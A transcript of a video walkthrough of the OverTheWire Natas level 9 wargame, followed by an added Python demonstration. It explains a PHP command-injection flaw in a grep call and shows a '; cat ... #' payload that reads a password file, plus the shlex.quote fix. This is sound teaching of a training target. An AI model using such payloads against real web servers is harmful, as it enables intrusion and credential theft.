Python Web Hacking: PHP Command Injection | Natas: OverTheWire (Level 9)

John Hammond · Intermediate · 🔐 Cybersecurity · 8y ago

Key Takeaways

Exploits PHP command injection vulnerability on Natas: OverTheWire (Level 9)

Full Transcript

What's up guys, John Hammond here, coming back at you with another video for the Natas wargame from OverTheWire. So we just got the password for level 9, and we've got a script that will get the webpage content for us so we don't have to use a web browser. This one looks like it's saying, "Alright, natas9, here's a form: you can find words containing..." and it inputs just a regular text variable, looks like with the variable name "needle", and it looks like it'll search for us. The output is displayed in preformatted text, and we could probably see that in the web browser if we really wanted to. Let's do that just so you get an idea of what this level looks like: natas9. And you can see there is another option here to view the source code, so we can check that out: index-source.html, that was the name of the file. We can do that in our Sublime Text stuff if we really wanted to; we could decode that if we wanted to, or we can just view it in the web browser, so it'll handle that a little bit more nicely.

Okay, so it looks like PHP code, with the variables with a dollar sign and all. `$key` is apparently set to whatever we post, to whatever is requested once we communicate with the server, and if `$key` is not an empty string it will passthru... hmm, what is that? Looks like a function, passthru. I'll check that out. Oh, it looks like it might be running a command here: grep. So like we've kind of done in the command line with the bash shell: grep whatever we pass to it, `$key`, in dictionary.txt. dictionary.txt must be a word list, a dictionary that it's looking through. What is the PHP passthru function? Is it literally just going to run a command for us? Yes, it will totally just execute commands and display output. Okay, so we could potentially have remote code execution here, and we can totally get in the way of it, because we're just passing in raw arguments to this thing.

So if we wanted to find words containing, say, "app": okay, all of these things in dictionary.txt, "apple" obviously, right, etc. So we can put more in here, like how about a period? So grep will use regular expressions here, and a period will match everything, just like in regular expressions it will match any character, so it returned the entire dictionary.txt file. But since we're supplying this as an argument that, you can see, went through without any quotes surrounding it to specify that as a single argument, we could bleed into other arguments here and specify other files that we want to read, or change up how this command works.

Let's take a look, and let's do that in our shell here, or in our Sublime Text script. needle can be "app" to see if we get responses. Let's run this. We don't want to go to index-source anymore, we want to be posting to the actual page. And we're getting all of this output. So can we return anything with the period? Huh, okay, I must be getting some strange characters out. So let's just go with "app". Huh. Maybe some strange characters are in this dictionary that Python does not want to render for us. We can change the encoding here, `coding=utf-8`, that's the magic Python syntax to suddenly be okay with Unicode characters. Will that work for us? No. Okay, man, that's super annoying. Let's do this with the web browser then, I suppose.

At least let's figure out our attack. Let's say we can actually return anything, and if we get a space in between this we can actually ask for another file that we want to look through, I think, right? Let's go to natas_pass, and we want natas10, right? Search. Looks like it returns the file that things matched in, but the Natas password file should get a result; it should have matched at some point. Let's check it out: Ctrl+F for "natas9", "natas10". No luck. Huh, was it in /etc? Is it just going to display anything for us that's not dictionary.txt? It doesn't look like there's any other notion of "natas". No. So maybe that didn't work.

Okay, well, we still have command execution, right? Can we do a period, or anything, from nowhere? Yep: nothing, nothing from nowhere, and use a comment to end what we're in and the rest of the line here, so it doesn't put in that dictionary.txt for us, but we use the semicolons to note a new command, right? Okay, cool, so we've got command injection just like that. So now we should just be able to cat natas_pass natas10. Is that not the right location? OverTheWire... what the heck, overthewire.org, what am I doing? /etc/natas_webpass. Oh, I'm a fool. So the old attack probably would have worked just fine: /etc/natas_webpass/natas10. Yeah, oh jeez, it totally would have worked just fine, except I'm an idiot. I'm sorry, I didn't even realize that path, guys; I thought it was the same syntax as the other wargames.

Well, hey, okay, that's done for us, right? There's the attack. We can return anything, and let's just get something that we know is in here. Actually, no, we can just say anything, and then we can still use a comment to not include the dictionary.txt file: /etc/natas_webpass/natas10, and use the hashtag here so we won't return the rest of the responses from the dictionary.txt file. We commented out the rest of that command here, so now we've got our password loaded, or displayed out to us, and let's use our regular expressions here to carve it out. Just like that, we get our password and we are good to go. So natas9 is done; we can put this in the script for natas10, and just like that we are ready to move on.

So I hope that made sense, a little bit of command injection, because that code was just being passed through to a real command, like a bash shell, and executing it, and we can just kind of wrap around the arguments and do some unique things with it. We can load content from other files, because that's the way grep works, and we can use other bash syntax stuff like comments, or other commands with the semicolon, to do other interesting things. So, cool hack, cool vulnerability there, and that's the real thing: command injection is for sure a real problem in web security stuff. So okay, now they filter on certain characters, huh? Let's get started on that in the next video. Guys, thank you for watching, hope you're enjoying these.
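
The level's bug and its fix, reproduced locally as an added example (this is not code from the video, from John Hammond's script, or from OverTheWire). The PHP the video reads does, in effect, `passthru("grep -i $key dictionary.txt")` with `$key` taken straight from the `needle` field; the script below rebuilds that command string in Python, runs it through `/bin/sh` the way `passthru()` does, and shows both the `; cat ... #` injection from the video and the fix, quoting the argument with `shlex.quote()`, the Python analogue of PHP's `escapeshellarg()`. Assumptions: the exact grep line (including `-i`) is taken as described above, the dictionary and the "secret" file are constructed sample data rather than the real Natas files, and the password carve-out assumes the 32-character alphanumeric Natas password format.

```python
"""Local demonstration of the Natas 9 style command injection (added example)."""
import os
import re
import shlex
import subprocess
import tempfile
from typing import Dict, Optional

# Assumption: mirrors the level's passthru("grep -i $key dictionary.txt");
# the needle is spliced into the string with no quoting at all.
COMMAND_TEMPLATE = "grep -i {needle} dictionary.txt"

# Constructed sample data, not the real Natas files.
DICTIONARY = "apple\nappetite\napron\nbanana\ncherry\n"
SECRET_FILE = "natas10_pass.txt"                       # stands in for /etc/natas_webpass/natas10
SECRET_PASSWORD = "0123456789abcdefghijklmnopqrstuv"  # 32 chars, constructed


def build_command(needle: str, quote: bool = False) -> str:
    """Rebuild the shell command the vulnerable PHP constructs.

    quote=False splices the needle in raw, exactly like "$key" inside the PHP
    string. quote=True wraps it with shlex.quote(), so the shell sees a single
    literal word; that is what escapeshellarg() does on the PHP side.
    """
    arg = shlex.quote(needle) if quote else needle
    return COMMAND_TEMPLATE.format(needle=arg)


def run_in_sandbox(cmd: str) -> str:
    """Run cmd through sh -c inside a temp dir holding the sample files.

    passthru() hands its string to a shell, so metacharacters in the needle
    (";", "#", "|", "$(...)") are interpreted. That is the whole bug.
    """
    with tempfile.TemporaryDirectory() as workdir:
        with open(os.path.join(workdir, "dictionary.txt"), "w") as fh:
            fh.write(DICTIONARY)
        with open(os.path.join(workdir, SECRET_FILE), "w") as fh:
            fh.write(SECRET_PASSWORD + "\n")
        proc = subprocess.run(["sh", "-c", cmd], cwd=workdir,
                              capture_output=True, text=True)
        return proc.stdout


def injection_payload() -> str:
    """The needle used in the video, aimed at the constructed secret file.

    ';' terminates the grep command, 'cat ...' runs as a second command, and
    '#' comments out the trailing ' dictionary.txt' so no dictionary noise
    follows the password in the response.
    """
    return f"; cat {SECRET_FILE} #"


def extract_password(output: str) -> Optional[str]:
    """Carve a 32-character alphanumeric token out of a response body.

    Assumption: Natas passwords are 32 characters of [A-Za-z0-9], which is
    the kind of pattern the video's script carves out with a regex.
    """
    match = re.search(r"\b[A-Za-z0-9]{32}\b", output)
    return match.group(0) if match else None


def demo() -> Dict[str, str]:
    """Run the three cases: a normal search, the injection, and the fix."""
    return {
        "normal": run_in_sandbox(build_command("app")),
        "leaked": run_in_sandbox(build_command(injection_payload())),
        "fixed": run_in_sandbox(build_command(injection_payload(), quote=True)),
    }


if __name__ == "__main__":
    for name, out in demo().items():
        print(f"--- {name}: {build_command(injection_payload(), quote=(name == 'fixed'))!r}"
              if name != "normal" else "--- normal: 'grep -i app dictionary.txt'")
        print(out, end="")
```

In the "leaked" case grep itself fails (it is left with no pattern and prints usage to stderr), but the injected `cat` still runs and its output is what the page returns; that is why the video's response contains the password and nothing from the dictionary. In the "fixed" case the quoted needle is handed to grep as one literal pattern and simply matches nothing.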

Original Description

If you would like to support me, please like, comment & subscribe, and check me out on Patreon: https://patreon.com/johnhammond010 E-mail: johnhammond010@gmail.com PayPal: http://paypal.me/johnhammond010 GitHub: https://github.com/JohnHammond Site: http://www.johnhammond.org Twitter: https://twitter.com/_johnhammond

